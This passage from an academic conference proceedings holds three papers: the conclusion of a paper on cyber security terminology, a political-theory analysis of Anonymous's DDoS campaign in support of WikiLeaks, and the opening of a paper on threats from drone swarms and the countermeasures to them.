Debi Ashenden
we know as information security (in the private sector) or information assurance (in the public sector).
She makes the point that by categorising cyber in this way it is possible to debate what form different
responses would take. Dunn Cavelty does not define cyber security but it is logical to take this to
encompass all of the rungs on this ladder as a generic term.
In his recent speech the Director of GCHQ suggested that 80% of cyber security vulnerabilities could be
solved by good information assurance (and, by implication, information security) practices. We have
developed approaches to information assurance and information security that have been matured over
the last ten years. There is considerable experience across the private and public sector and a growing
programme of increasingly cross-disciplinary research. It is the other 20% of cyber that we need to turn
our attention to now. This is described as the ‘complex threat’ (Director GCHQ, 2010) and includes, in
Dunn Cavelty’s terms, that part of cyber espionage that is state sponsored, cyber terrorism and cyber
war.
If we combine the cyber escalation ladder with the assertions made by Director GCHQ we end up with
the model below – which may well prove to be a useful way of framing attempts to engage with the public
and debate issues across academic disciplines.
Cyber
War
CNA* as
strategic & stand
alone
Cyber War
CNA* as
tactical
Cyber Terrorism
Cyber Espionage
Cyber Crime
Cyber Vandalism/Hactivism
20% of the problem
- the ‘complex threat’
80% of the problem
– already being
addressed
*CNA –
Computer Network Attack
Figure 1: A model for discussing cyber security
A lexicon for cyber is necessary then, at least at a high level, in order to conceptualise the problems and
to support work that crosses academic disciplines. Consistency in our use of language is also necessary
if we are to engage the public in a meaningful way. A note of caution should be sounded though – such a
lexicon needs to be fit for purpose rather than perfect. In other areas, namely information assurance and
information security, we have spent too much time trying to define terms to the detriment of actually
discussing the issues.
6. Conclusions
Cyber security is the topic of the moment and is likely to be for at least a few years to come. We have
practiced using ‘cyber’ in various ways and now we need to work out exactly what it means and what the
15

Debi Ashenden
implications are. It is time for engagement with the public and debate among experts. As a first step a
lexicon for the subject would support the development of an intellectual framework that crosses academic
disciplines. The new cyber security institutions are multi-agency and we need to reflect that academically
by bringing together disciplines such as politics, technology, social science, ethics and law. As we have
seen the public can be both a vulnerability and a threat in cyberspace and there are complex issues to be
examined. Successful engagement with the public will help us deliver the 80% of cyber security
suggested by the Director of GCHQ while the remaining 20% will require a very different type of
engagement that includes influence and persuasion activities. Before we can do this though we need to
know what our message is by debating the issues. As our thinking develops we can start to encourage
better quality journalism that portrays cyber security in a serious and thoughtful way and that engages
public thinking, sets the agenda and frames the issues.
References
Bendrath, Ralf (2001), ‘The Cyberwar Debate: Perception and Politics in US Critical Infrastructure Protection’
Information & Security, Volume 7, pp 80-103
Clarke, Richard A. and Knake, Robert K. (2010) ‘Cyber War’, Harper Collins
Denning, Dorothy E. (2003) ‘Information Technology & Security’, Naval Postgraduate School, Center of Terrorism
and Irregular Warfare, Monterey, CA
Denning, Peter J. and Denning, Dorothy E. (2010) ‘The Profession of IT: Discussing Cyber Attack’, Communications
of the ACM, Vol 53, No 9, pp 29-31
Director, GCHQ (2010) Speech given at the International Institute of Strategic Studies, UK 13 th October 2010,
[online] International Institute of Strategic Studies, http://www.iiss.org/recent-key-addresses/iain-lobbanaddress/
Dunn Cavelty, Myriam, (2010) ‘The Reality and Future of Cyberwar’, Parliamentary Brief, 30 th March 2010 [online]
http://www.parliamentarybrief.com/2010/03/the-reality-and-future-of-cyberwar
Farivar, Cyrus, ‘A Brief Examination of Media Coverage of Cyberattacks (2007-Present), 2009 Conference
Proceedings, Conference on Cyberwarfare, 2009, [online] http://www.ccdcoe.org/230.html
The Guardian Newspaper, (2010) 28 th August
The Guardian Newspaper, (2011) 28 th January
Michael, James Bret, Tikk, Eneken, Wahlgren, Peter, Winfield, Thomas, C, (2010) ‘From Chaos to Collective
Defense’, in IEEE Computer, 43(12)
National Research Council, (2009) ‘Technology, Policy, Law, and Ethics Regarding US Acquisition and Use of
Cyberattack Capabilities’, Owens, William A, Dam, Kenneth, W, Lin, Herbert, S, (Editors), National Academies
Press
Nye, Joseph, S. Jr, (2010) ‘Cyber Power’, Harvard, Kennedy School, Belfer Center for Science & International Affairs
[online] http://belfercenter.ksg.harvard.edu/files/cyber-power.pdf
16

This is not a Cyber war, its a...? Wikileaks, Anonymous and
the Politics of Hegemony
David Barnard-Wills
Cranfield University, Shrivenham, UK
d.barnardwills@cranfield.ac.uk
Abstract: This paper conducts a political theory analysis using the conflict, attacks and ‘hactivism’ surrounding the
WikiLeaks organisations following recent diplomatic cable releases, as a case study to demonstrate the complexity of
contemporary cyber conflict. This complexity is reflected in the motivations, identities and values of a multiplicity of
(often non-state) actors. Already termed ‘the first visible cyber war’ this is no simple two-sided conflict (having already
drawn in states, media organisations, banks and payments companies, and loose coalitions of individuals) and it is
one which traditional metaphors and analogies of war may occlude as much as they reveal. International Relations
and critical security studies have developed a range of approaches to international conflict that focus upon the
identities, values and normative frameworks of participants. These interpretative movements offer a productive way
of understanding cyber conflict, and this paper therefore demonstrates their application. The theory of securitization
is used to demonstrate the politics inherent in the act of labelling a conflict ‘war’ and how this applies to the cyber
environment. The paper makes use of Antonio Gramsci’s concept of Hegemony, and Ernesto Laclau’s concept of
democratic demands. These models allow us to examine the contested construction of meaning in cyber conflict, a
contestation which applies to the very terminology of the discussion. From this perspective, activities such as
distributed denial of service attacks on Mastercard, Visa etc, can be interpreted as an attempt to establish a
dominant discursive position and to construct a coalition of sentiment and meaning around a set of political issues –
in this case freedom of speech and internet censorship in conflict with state and commercial models of online activity.
As a struggle for hegemony rather than a ‘war’ we can understand that hegemony is never total, nor permanent. The
cyber conflict is not ‘won’ but instead something that is perpetually worked out.
Keywords: WikiLeaks, cyberwar, cyber conflict, language, international relations
1. Introduction
This paper performs a political theory analysis using the conflict, attacks and hactivism surrounding the
recent publication of US diplomatic cables by the WikiLeaks organisation as a case study to demonstrate
the inherent complexity of contemporary cyber conflict.
Analyses of Cyberwar threaten to gravitate towards two poles, one arising from International Relations
security studies and the second from information security (Nissenbaum 2005). The first of these draws
primarily upon geopolitical analysis, the functions and strategic needs of states in an anarchic world
system. A typical example might be Joseph Nye’s ‘Cyber Power’ (Nye 2010). These accounts generally
attempt to incorporate ‘cyber’ either as a space of conflict (Barnard-Wills & Ashenden Forthcoming) or a
tool for various actors already active in international politics. The second performs a technological
analysis of particular network level activity, attempts to locate and assess particular cyber attacks and
determine effective countermeasures. An example of the second would be Project Grey Goose (Project
Grey Goose 2008). The account of international security politics in such accounts if often theoretically
and conceptually shallow, and makes simplifying assumptions about the effects of technological
processes on broader social structures.
We present the argument that both of these perspectives lack an understanding of norms, identities and
values that play an important part in accounts of cyber conflict and that simply taking a middle path
between the two poles continues this problem. The paper therefore provides an account drawing upon
critical security studies perspectives and a post-structural theory of the formation of group identities.
Critical security studies is a developing set of perspectives within international relations security studies.
Traditional geopolitical perspectives (often termed ‘Realism’ within the discipline) are based upon certain
foundational rules. States are the primary, or even sole, important actor in international relations. There is
always an enemy, but the identity of this enemy is not particularly important for understanding the
function of the inter-state system. Conflict is the motivating force in international affairs, and the model
assumes that states have permanent interests (Coker 2009, p.131). Following Cox’s insight that ‘Theory
is always for somebody and for some purpose’ (Cox 1981) security studies can be seen as developing in
the west during the cold war in an attempt to answer the problem of why states go to war, and to study
the threat and use of military force (Peoples & Vaughan-Williams 2009, p.19).
17

David Barnard-Wills
Karen Fierke suggests that due to attempts to develop new approaches and answers, and a rejection of
universal and transitive interests and behaviours among states, critical security studies has arguably
been more in line with a changing world than its mainstream counterparts (Fierke 2007, p.27). A
sensitivity towards identity and interests is more appropriate than a theory which assumes an unchanging
security environment over time (Fierke 2007, p.28). Furthermore, the Realist perspective concerns itself
with the interests of states and as such is poorly calibrated for understanding the actions of sub-state or
non-state actors (Peoples & Vaughan-Williams 2009, p.20) precisely those that can become involved in
cyber conflict.
2. The cyberwar?
This section of the paper sets out a brief overview of the events following the WikiLeaks ‘Cablegate’
release of US diplomatic cables. This series of events has been selected because it demonstrates a
number of features that have been increasingly associated with contemporary cyber conflict. It has also
been called, somewhat loosely, the first visible cyber war. Because of these features this set of events
provides insight for thinking about cyber conflict more broadly. The conflict has involved non-state actors
and the ‘weapon of choice’ appears to be distributed denial of service attacks. However looking at the
events from a holistic perspective that includes political, legal and symbolic aspects suggests a more
complicated reading.
In late November 2010 the whistleblowing and journalism organisation WikiLeaks starts to make publicly
available secret cables from United States diplomats. It is rapidly condemned by the US government.
Over the following days, quite a range of actors becomes involved in this at quite high tempo.
Much of the reporting in the technical media focused upon the movement between various hosting
services and a series of electronic attacks. Shortly after the cable release WikiLeaks’ website comes
under two denial of service attacks, seemingly from a US ‘patriotic hacker’, which force it offline.
Additionally the Chinese government blocks access to WikiLeaks from within China. The attacks force
WikiLeaks to move from servers in France to two Amazon cloud servers on the 29 th . Amazon then
removes WikiLeaks from its S3 server in the US stating a terms of service violation (Amazon Web
Services 2010). The Berkman Center report on civil society and human rights groups that are the target
of denial of service attacks suggests making hosting arrangements closer to the ‘core’ of the internet to
benefit from the capacity and resilience of major service providers, and finding internet service providers
who will commit not to remove controversial content unless required to be law (Zukerman et al. 2010,
p.5). This seems to be the motivation for moving to cloud servers, but was in this case ineffective due to
the unwillingness of such a provider to host. Shortly after everyDNS.net kills the wikileaks.org address,
forcing a move to the Swiss wikileaks.ch. WikiLeaks is now hosted by Swedish company Banhof AB
which excites the media by being inside a bomb shelter.
On the evening of the 3 rd December PayPal stops processing donations to WikiLeaks stating a violation
of acceptable use and that it considers WikiLeaks to have violated its service agreement on encouraging,
promoting, facilitating and instructing others in illegal activity (PayPal 2010). It is followed on the 7 th by
Mastercard and Visa Europe who also stop processing payments. Visa Europe Ltd blocked donations to
WikiLeaks and Sunshine Press (the associated fundraising organisation) from December 8 th pending an
investigation into the nature of WikiLeaks business and if it contravened Visas operation conditions. The
internal investigation is ongoing, and payments have not been resumed (Associated Press 2011).
Declaring its support for WikiLeaks campaign for transparency and free speech and high critical of those
organisations that had suspended their interactions with the organisation, the internet collective
‘Anonymous’ redirected its Operation Payback away from the Motion Picture Associate of America
(MPAA) and International Federation of the Phonographic Industry (Zukerman et al. 2010, p.6) towards
the opponents of WikiLeaks. Anonymous has previously also taken action against the Church of
Scientology. Anonymous has demonstrated a relatively high level of technical capacity as well as
knowledge of its targets. Using a distributed denial of services attack (DDoS) using the ‘Low Orbit Ion
Cannon (LOIC)’ software, Anonymous attacked PayPal on December 6 th and Mastercard on December
8 th .
An Anonymous press release suggested a number of tactics in addition to DDoS attacks: a boycott of
Paypal, to spread and mirror the leaked diplomatic cables, form a ‘human DNS’ system to make them
impossible to censor, to upvote Assange on Time’s person of the year list to increase public exposure. It
also advocates posting on ‘critical hubs of information distribution’ to ‘make sure everyone you know is
18

David Barnard-Wills
aware of what is happening’. Offline strategies included printing out and distributing locally relevant
cables, complain to local member of parliament or political figures, and conventional protest (marches,
petitions etc). Operations Payback and Avenge Assange interweave online strategies and actions into
protest and political action. This is not inherently surprising because the online environment is one of the
‘places’ where people enact politics, economics, communicate with peers and get information. That
political communication and protest activity move here too is to be expected.
The ‘Low Orbit Ion Cannon’ software does not disguise IP addresses and potentially leaves users open to
tracking. On the morning of January 28 th 2011, three teenagers and two adults were arrested in the UK
under the Computer Misuse Act 1990 for their alleged involvement in Operation Payback (BBC 2011). A
press release from ANON OPS responding to this interpreted the arrests as a sign that the UK
government does not understand the ‘present-day political and technological reality’ but also as a
declaration of war by the UK government against Anonymous. (Anonymous 2010). In co-ordinated
activity, the FBI executed more that forty search warrants across the USA, whilst issuing its own press
release reminding the public that participating in a DDoS is illegal and punishable with ten years
imprisonment (FBI National Press Office 2011). This should raise some caution towards the assumption
that cyber attacks are generally anonymous.
3. Language and securitization
There are two levels of analysis here – the first is the relatively simply question that asks ‘is the conflict
between Anonymous and service providers, in support of WikiLeaks, a cyber war’? The answer to which
is rapidly negative. However, this question reveals a second deeper set of questions about the process of
naming and defining a cyber war; a process that involves language and the politics of securitization.
‘Cyber war’ currently has no objective definition against which we can assess an event or series of events
and make a clear assessment if these events count as cyber war or not. There are a set of usual reasons
why such a definition is absent. These revolve around antagonistic relations between states unwilling to
settle on a definition which would either curtail their ability to act in this domain, or require them to take
particular action that they wish to avoid. Also, in the historical absence of anything universally recognised
as a cyber war, comparison is complex.
However the absence of a clear definition has more substantial epistemological underpinnings. If we
spend some time examining cyberwar’s antecedent concept, that of war itself, we can find a similar
contested understanding. Fierke (2007, p.34) describes security as an essentially contested concept and
we can extrapolate a similar understanding of war. The criteria for an essentially contested concept is
that a concept must have value associated with it, be internally complex and part of a broad conceptual
landscape and have relatively open rules of application, so that users can interpret the concept differently
in response to different real world events. Typical examples in political theory would be ‘justice’ or
‘equality’, meaningful terms around which political ideologies are structured, and which are used to make
political claims.
Political language is not simply descriptive but also evaluative. To term something a ‘war’ or not, is not
just to describe, but also to judge (Jackson 2005, p.23). To accept an account of an essentially contested
concept is to also accept political activity in line with that commitment (Fierke 2007, p.34).
Bobbitt argues that the entire system of laws of war is predicated in part upon the definition of warfare
(Bobbitt 2008, p.455). War is a human social artefact (Fierke 2007, p.57), but one that is potentially at
odds with other human ends. The search for definitions and check lists is missing the contested and
politicised nature of language and the penetration of the definitional exercise by securitization moves.
Labelling a set of events as ‘war’ is a clear example of a securitizing move. A theoretical concept initially
developed by the Copenhagen school in international relations, ‘securitization’ does not mean ‘to make
something more secure’ but rather to define something as needing to be secured (Buzan et al. 1998,
p.36). Conventionally the referent object of this securitization is the nation state, a political regime or ‘the
people’. The concept of national security assumes that the nation state has to survive and it is therefore
necessary for the state to maintain armies, produce weapons and seek out intelligence (Peoples &
Vaughan-Williams 2009, p.76).
Normal politics is characterised by haggling and contestation, but multiple actors and agencies with
varying priorities as well as resources. Successfully securitizing an issue removes it from this melee and
19

David Barnard-Wills
justifies prioritising it over other issues (Fierke 2007, p.108). When an issue is successfully presented as
an existential security threat, then it legitimates exceptional political measures (Peoples & Vaughan-
Williams 2009, p.76).
Labelling as war is not simplistic however. There are important questions as to who is labelling. Certain
actors will be more effective at labelling issues as security issues than others. This relies upon their
credibility and right to speak to relevant audiences. A securitizing actor requires enough social and
political capital to convince their audience of the existential threat. This authority currently appears to
emerge from the two poles of cyber security, state security actors and computer security actors, with their
own forms of securitization. Certain issues are also easier than others to securitize, given their historical
associations with existential violence (Peoples & Vaughan-Williams 2009, p.79). The Cyber environment
is relatively new in this in that it really does not have a history of violence, not in the same way as massed
tanks on an international border. Therefore the use of the term ‘war’ is a bridging metaphor to more
familiar linguistic descriptions of physical conflict. The concept of ‘information warfare’ is a similar
securitizing move, applying military metaphors to industry and commerce (Munroe 2005). Nissenbaum
had already highlighted the problems of dominating Information security through a political frame
(Nissenbaum 2005, p.73) and war can be understood as the paradigmatic form of the political state frame
given the states claim to monopoly on the legitimate use of violence.
A different name for the same set of events may generate both different perceptions of those events,
emotional and affective responses to those events and political and strategic responses to them. Jackson
provides the example of a protest, the description of which as a ‘generally ordered protest’ or an
‘anarchist riot’ would affect the way that police forces respond to future demonstrations (2005, p.23).
Labelling a series of actions and events as cyberwar therefore suggests a particular set of responses.
This is not deterministic, and there is scope for individual or group agency. However, particular
discourses – ways of making sense of the world – and particular categorisations construct particular
responses as rational and others as nonsensical. The labelling of DDoS attacks as a type of war, brings
with it a historical set of associations, a set of assumptions about the appropriate way to deal with those
problems, and the appropriate agencies for engaging with them. ‘War’ is traditionally the preserve of
military agencies, and responses include the use of force. Peoples and Vaughn-Williams argue that the
key insight of the securitization model is that security is not always a ‘good thing:
Secuitization of an issue brings with it a particular type of emergency politics where the
space (and time) allowed for deliberation, participation and bargaining is necessarily
constricted and brings into play a particular militarised mode of thinking (Peoples &
Vaughan-Williams 2009, p.83).
For example, treating the teenagers arrested for participating in LOIC attacks as warfighters would be
hugely problematic.
We can also suggest the prefix ‘cyber’ is also doing some securitizing work. This prefix is an evocative
placeholder for more prosaic terminology, evoking novel, high-tempo and technological otherworld. For
Coker, war seems to have escaped the narrow parameters it was located within during the twentieth
century. Not because of any inherent expansion, but because of the extension of ‘security’, the dominant
‘grammar of violence’ of our age across the variety of social life (Coker 2009, p.62).
Jackson also identifies the importance of language for legitimating and enacting political violence.
Wars cannot be fought without the willing participation of large numbers of individuals from
across the social spectrum. Enlisting such support requires altering the perception of
individuals to comprehend the need for employing force, structuring their cognition so it
appears as a reasonable and logical course of action and arousing them emotionally so they
will participate or at least acquiesce to violence (Jackson 2005, pp.23-24)
Talk of cyberwar is part of a rhetorical chain that prepares the ground for ‘violence’ in cyberspace and
support for this action. It is precisely this dynamic, through which language constructs perceptions and
affects political attachments to which we now turn driven by critical security studies, this time with the
focus on identity and motivations for Anonymous.
20

David Barnard-Wills
4. Anonymous identities, values and demands
The 2006 US Quadrennial Defense Review argued that traditional inter-state threats were giving way to
decentralised network threats emerging from non-state actors, and that the spectrum of irregular conflict
was expanding. Coker argues this perception of threats arising from unknown and unknowable non-state
actors has penetrated across the way the West thinks about conflict (Coker 2009, p.ix). It is easy to see
how from certain perspectives Anonymous could be seen to fit within this paradigm. Anonymous appears
decentralised, ambiguous, non-state and not motivated by traditional concerns of international relations. It
is also harnessing modern information technology for its political activity and to support its decentralised
organisation. It fits with a perception of modern hazards as differing from the past – they cannot be
conveniently or simply delineated in time and space (Coker 2009, p.70).
It also fits with the concern regarding the apparent proliferation of ‘patriotic hackers’. Much attention has
been paid to an apparent developing trend, in which popular cyber campaigns mirror political, economic
or military conflicts in cyberspace, primarily conducted by ‘cyber militia’ (Ottis 2010b, p.1). Estonia in
2007 and Georgia in 2008 are seen as the paradigmatic examples of this type of activity, with a focus
upon militia either directed by a state, or self-organising along line that parallel state interests. Activity by
these militia is considered problematic because they are often anonymous (small ‘a’) and their
association to a state is hard to ascertain. Comparing such militia to ‘farmers with laptops’ Ottis provides
a break down the of the minimum resources and skills required to conduct an effective cyber campaign,
and finds very low barriers to action, especially for manual or voluntary botnets for distributed denial of
service attacks (Ottis 2010a). However he does suggests that a requirement for a successful cyber
campaign is that some members must have a deeper understanding of cyber activity.
However not all participants in cyber conflict are driven by nationalist afflication, nor by association with
existing political organisations – even decentralised ones. We can relate this activity to a process of
identity formation associated with a collective horizon of values and perceived interests. The selfproclaimed
intentions and motivations of groups such as Anonymous should be taken seriously in any
coherent analysis of their activity. Identity should be understood as an ongoing continual process rather
than a settled descriptor or essential unchanging aspect. For Fierke it is a social category that
incorporates the self-ascribed identity that the individual actor gives themselves, but also the definitions
one ascribes to others and have ascribed upon them (Fierke 2007, p.76). Identity is fundamentally
relational.
Anonymous describes itself as ‘not a group, but rather an internet gathering’ (ANONOPS press release),
but this is itself problematic. There is no membership structure, no officers, designated representatives or
legal existence. One can join simply by claiming so (or even by identifying with Anonymous). Being on
certain forums will make you more aware of what it is doing and able to participate in its functions.
However one can speak for Anonymous by simply doing so (and in a sense, every Anon forum post does
so), although how seriously this is taken by a range of interested actors will vary. One is a member of
Anonymous simply to the extent that one recognises oneself as a member of Anonymous. Whilst
spokespeople for Anonymous have communicated with mainstream media (for example ‘Coldblood’ was
interviewed on the BBC Radio 4 ‘Today’ programme) this language mirrors that used in other protest
movements. Students in Paris in 1968, and anti-globalisations activists in the late 1990s both regularly
stated that their representatives were only spokespeople, not leaders.
This draws upon a consensus/participation model, in which if an identifying individual doesn’t like a
particular action, they can simply not participate in this action without any in-group consequences. Nor is
Anonymous without internal discussion. For example the use of denial of service attacks has not been
without its internal criticism and caution has been expressed that continued DDOS attacks will promote a
public backlash backlash (Keane 2011). An anonymous press release discussees the groups
relationshop with WikiLeaks and argues that the association is primarily a shared set of ethics and
political goals.
“while we don’t have much of an affiliation with WikiLeaks, we fight for the same reasons. We want
transparency and we counter censorship. The attempts to silence wikileaks are long strides closer to a
world where we can not say what we think and are unable to express our opinions and ideas.”
(http://pandalabs.pandasecurity.com)
21

David Barnard-Wills
The extent to which the members are known to each other is open to question. Ottis discussed cyber
militia with relatively loose ties, which require them to communicate online. Anonymous, and its origins in
4Chan arguably have a different relationship. To talk, as Ottis does, of ‘real life’ connections is to miss the
point somewhat, and negate the importance of online created and lived identities. Ottis suggests that this
lack of ‘real world’ connections creates a particular vulnerability to information operations techniques
(Ottis 2010b, p.2). However some connections in these online environments can be very deep, very
detailed and very meaningful. Of course, other connections can be very ephemeral. It is hard however to
disentangle the two from an external perspective.
The concepts of Hegemony democratic demands provide us with potential analytical purchase upon the
anonymous cyber attacks. The Marxist philosopher and social theorist Antonio Gramsci (1891-1937)
theory of hegemony was part of an attempt to overcome the economic determinism of Marxist thought.
Rather than being determined by the economic substructure, explanations of social change were instead
to be found in the relatively autonomous realm of ideas and ideology. This was to emphasise the role of
human agency and choice. Hegemony is the ability to gain control of ideas that manipulate social
consciousness. Rather than being solely determined from above, this was ‘a negotiation between the
dominant and controlled class over what the latter will accept to believe and what they will not swallow’
(Woodfin & Zarate 2004, p.123), and as such was an ongoing process. In trying to explain the uneven
and unsuccessful nature of socialist revolution across Europe in the early 20 th century, Gramsci
suggested that revolution can only take place if there is a genuine alternative worldview accepted by the
widest range of exploited social groups.
For Laclau, for a political demand to be classed as democratic, it must meet two criteria. Firstly, that it is a
demand formulated to the system by an underdog of some kind. Because of this it carries an egalitarian
dimension. Secondly, the very emergence of a democratic demand presupposes some kind of exclusion
or deprivation (Laclau 2005, p.125). Laclau’s analysis of populist reason and the emergence of collective
group identities suggests that it is the making of demands that cannot be fulfilled that is necessary for the
emerge of shared identities (Laclau 2005, p.127). Given that Laclau’s study is addressed to populist
social movements for example those in East Europe or Latin America, these shared identities are often
‘the people’ – however we can identify certain similarities with collective identities such as that articulated
by Anonymous and other WikiLeaks supporters. The Anonymous press release sums this up by saying
‘we are not a group of hackers, we are average Internet Citizens’ (Anonymous 2010). The January 28 th
press release does however also refer to Anonymous as ‘the people’ (Anonymous 2010). Any essential
characteristics of membership are effaced in their communication, which stresses inclusion and ideas.
Whilst we can anticipate some demographic striations (age, gender, language etc) of participants, these
are not seen as important to the communicators.
‘an interest in freedom and openness belongs to a world of liberal democracies where these
practices are tied to legitimacy’(Fierke 2007, p.80).
We can therefore contextualise Anonymous as an open expansive movement driven by a set of values
formed around the online environment, freedom, and lack of censorship. Perceiving WikiLeaks as
ideologically aligned, members recognise this value set and identify themselves as member of
anonymous and a wider incipient non-state collective identity as internet citizens. The impossible
demands for absolute freedom of speech solidifies the group identity in the face of external contestation.
Their target is not system security but rather a much broader communicative field, not a power-politics,
but a more discursive one – DDoS as communicative act and presentation of nascent political identity.
5. Conclusions
It is fairly unproblematic to suggest that the digitally mediated contestation between the hacktivist group
Anonymous in support of WikiLeaks and various online payments providers is not an example of war. It is
however an example of how complicated a multi-actor international political environment can be and how
a traditional state-centric perspective on security is fundamentally flawed in the cyber domain. To this end
the paper suggests drawing upon critical security studies perspectives from International Relations and
social theory. The Copenhagen school account of the process of securitization allows us to understand
the importance of language and speech acts in creating and maintaining a security environment, and
suggests caution in the application of the label ‘war’. Secondly, the perspective also suggests attention
towards the identities, values and processes of group formation which bring together a loose coalition of
online actors in support of particular value set and political position. This account is a useful corrective to
accounts of ‘patriotic hackers’ or ‘cyber jihad’, and it is hoped that wider adoption of the theoretical tools
22

David Barnard-Wills
and perspectives of critical security studies in the field of cyber conflict can allow it to move beyond
shallow and empirically lacking models.
References
Amazon Web Services, 2010. Message. Available at: http://aws.amazon.com/message/65348/ [Accessed February
2, 2011].
Anonymous, 2010. ANON OPS: A Press Release. Available at:
http://www.wired.com/images_blogs/threatlevel/2010/12/ANONOPS_The_Press_Release.pdf [Accessed
January 28, 2011].
Associated Press, 2011. The Associated Press: No proof WikiLeaks breaking law, inquiry finds. Available at:
http://www.google.com/hostednews/ap/article/ALeqM5jwrDLCLioMJW7qeke8jNQP3_vGLg?docId=8824887824
cc4c89982bbe407c103304 [Accessed January 31, 2011].
Barnard-Wills, D. & Ashenden, D., Security Virtual Space: Cyberwar, Cyberterror and Risk. Space and Culture
Bobbitt, P., 2008. Terror and consent : the wars for the twenty-first century, London: Allen Lane.
Buzan, B., Waever, O. & de Wilde, J., 1998. Security: A New Framework for Analysis, London: Lynne Rienner.
Coker, C., 2009. War in an age of risk, Cambridge: Polity.
Cox, R., 1981. Social Forces, States and World Orders: Beyond International Relations Theory. Millenium: Journal of
International Studies, (10), 126-155.
FBI National Press Office, 2011. FBI — Search Warrants Executed in the United States as Part of Ongoing Cyber
Investigation. Available at: http://www.fbi.gov/news/pressrel/press-releases/warrants_012711 [Accessed
January 28, 2011].
Fierke, K., 2007. Critical approaches to international security, Cambridge: Polity.
Jackson, R., 2005. Writing the war on terrorism : language, politics and counter-terrorism, Manchester: Manchester
University Press.
Keane, B., 2011. Anonymous arrests shine a light on some (much) bigger issues – The Stump. Crikey.com. Available
at: http://blogs.crikey.com.au/thestump/2011/01/30/anonymous-arrests-shine-a-light-on-some-much-biggerissues/
[Accessed January 31, 2011].
Laclau, E., 2005. On populist reason, London ;;New York: Verso.
Munroe, I., 2005. Information Warfare in Business: Strategies of Control and Resistance in the Network Society.,
London: Routledge.
Nissenbaum, H., 2005. Where Computer Security Meets National Security. Ethics and Information Technology, 7(2),
61-73.
Nye, J., 2010. Cyber Power, Harvard: Belfer Center for Science and International Affairs.
Ottis, R., 2010a. From Pitchforks to Laptops: volunteers in Cyber Conflicts. In Conference on Cyber Conflict
Proceedings 2010. Tallinn, Estonia: CCD COE Publications, pp. 97-109. Available at:
http://www.ccdcoe.org/articles/2010/Ottis_FromPitchforks.pdf.
Ottis, R., 2010b. Proactive Defense Tactics Against On-Line Cyber Militia, Cooperative Cyber Defence Centre of
Excellence.
PayPal, 2010. PayPal statement regarding WikiLeaks. Available at: https://www.thepaypalblog.com/2010/12/paypalstatement-regarding-wikileaks/
[Accessed February 2, 2011].
Peoples, C. & Vaughan-Williams, N., 2009. Critical security studies : an introduction, London: Routledge.
Project Grey Goose, 2008. Russia/Georgia Cyber War - Findings and Analysis, Available at:
http://www.scribd.com/doc/6967393/Project-Grey-Goose-Phase-I-Report.
The Guardian, 2011. Police arrest five over Anonymous WikiLeaks attacks. The Guardian. Available at:
http://www.guardian.co.uk/technology/2011/jan/27/anonymous-hacking?INTCMP=SRCH [Accessed January
28, 2011].
Woodfin, R. & Zarate, O., 2004. Introducing Marxism, Royston: Icon.
Zukerman, E. et al., 2010. Distributed Denial of Service Attacks Against Indepdent Media and Human Rights Sites,
The Berkman Center for Internet & Society at Harvard University. Available at:
http://cyber.law.harvard.edu/sites/cyber.law.harvard.edu/files/2010_DDoS_Attacks_Human_Rights_and_Media.
pdf [Accessed January 28, 2011].
23

Potential Threats of UAS Swarms and the Countermeasure’s
Need
Laurent Beaudoin, Antoine Gademer, Loica Avanthey, Vincent Germain and
Vincent Vittori
ESIEA, ATIS Dept., Paris, France
beaudoin@esiea.fr
gademer@esiea.fr
Abstract: The rising capabilities and growing accessibility of recent Unmanned Aerial Systems (UAS) widen the risks
of success of a terrorists attack through the current aerial defence systems. We will examine first the complexity of
the threats from a single unmanned vehicle, to a team of unmanned vehicles and finally to a swarm of unmanned
vehicles (and any other association of these three combinations). Then, from an operational point of view, we will see
that early detection of danger - a critical stage in the development of counter-attacks - has become very difficult
because small unmanned vehicles like UASs precisely possess the ability to take off directly within the sphere of
attack. The next stage, equally critical, consists in elaborating the response that best fits the attack. We distinguish
three general categories of active and passive countermeasures: destruction, incapacitation and jamming of the
enemy UASs. We will then study several possible countermeasures appropriate to the type of attack (enemy’s
formation: isolated drone, team, swarm; weapon type: bomb, kamikaze, bacteriological etc.). We first present
countermeasures that are rather conventional (they usually come from air defense systems) and others specific to
the UAS case. We will finish by a case study in which we will tackle the use of simplified physical models for
calculating positions in real time in an optimized way in a UAS swarm under constraints.
Keywords: unmanned aerial system, swarms, countermeasure, terrorism
1. Introduction
We previously presented the risks presented by the use of single micro-UAS by terrorist groups given the
current flaws in the aerial defence systems (Beaudoin & Gademer, 2010). This scenario is nowadays
more than conceivable considering the rising capabilities of recent UASs and their growing accessibility.
This perspective thus opens new breaches, even more dangerous than the previous ones, and renders
obsolete most of the existing solutions.
This article deals with the potential threats related to the use of micro UASs, which weigh less than 5
kilograms, for terrorist purposes in two ways: the increasing level of automation of these systems and
their new capacity for collaboration. In a second step, we will discuss the current counter measures to
prevent or fight such situations. Then we will widen the debate with a case study that includes the
prospects offered by collaborative systems in terms of counter-measures.
2. Technological abilities for new threats
2.1 Unmanned Vehicle Systems (UVSs) and level of automation
Automated unmanned vehicles are robots of different sizes (Abatti et al., 2005), carrying no human on
board, but designed to fulfil various types of missions known as the three "Ds" (Dull, Dirty or Dangerous).
They can be remotely controlled or follow a predetermined plan or react to their environment, or even use
a combination of the three previous situations. In the literature (Christ, 2007, Singer, 2009), robots are
often spoken about, and you can find a lot of autonomy scales. But more than the autonomy (which is a
bit anthropomorphic) we prefer to define an automation scale.
We will distinguish several levels of automation:
Level 1: Slave (assisted piloting, disturbance compensation)
Level 2: Automated (maintains its orders and takes high level orders)
Level 3: Automatic Navigation (a priori mission plan)
Level 4: Response from contextual data (dodging) without human intervention
Level 5: Decision-maker (expert system) from contextual data (navigation in unknown environment,
realization of complex missions, coordination)
Levels 1 and 2 require the intervention of a pilot during the mission and therefore a continuous
communication link between himself and the UVS during the attack.
24

Laurent Beaudoinet al.
At level 3, the system is independent of the pilot and knows how to place itself in its environment. For
this, it relies on passive sensors (AHRS, GPS, clock…) and blindly follows the mission plan that has been
given to it beforehand. This involves a detailed knowledge of the place in which the mission will take
place to make sure everything goes smoothly.
At level 4, the system has a minimum knowledge of its surrounding environment and can react to events
such as performing collision avoidance. To do this it uses a number of active sensors (distance
measurement, short range communications, etc.), but the establishment of an accurate mission plan
beforehand remains a fundamental element.
Level 5 introduces concepts of artificial intelligence and decision-making that require significant
computing power. To take full advantage of these new features, many perceptive sensors are usually
added, as well as a large storage capacity that allows the robot to make inferences from the state of its
environment, both in space and time. These robots are able to realize complex missions in unexplored
environments, to interact with them in a meaningful way, or to reschedule an ongoing mission because of
encountered events.
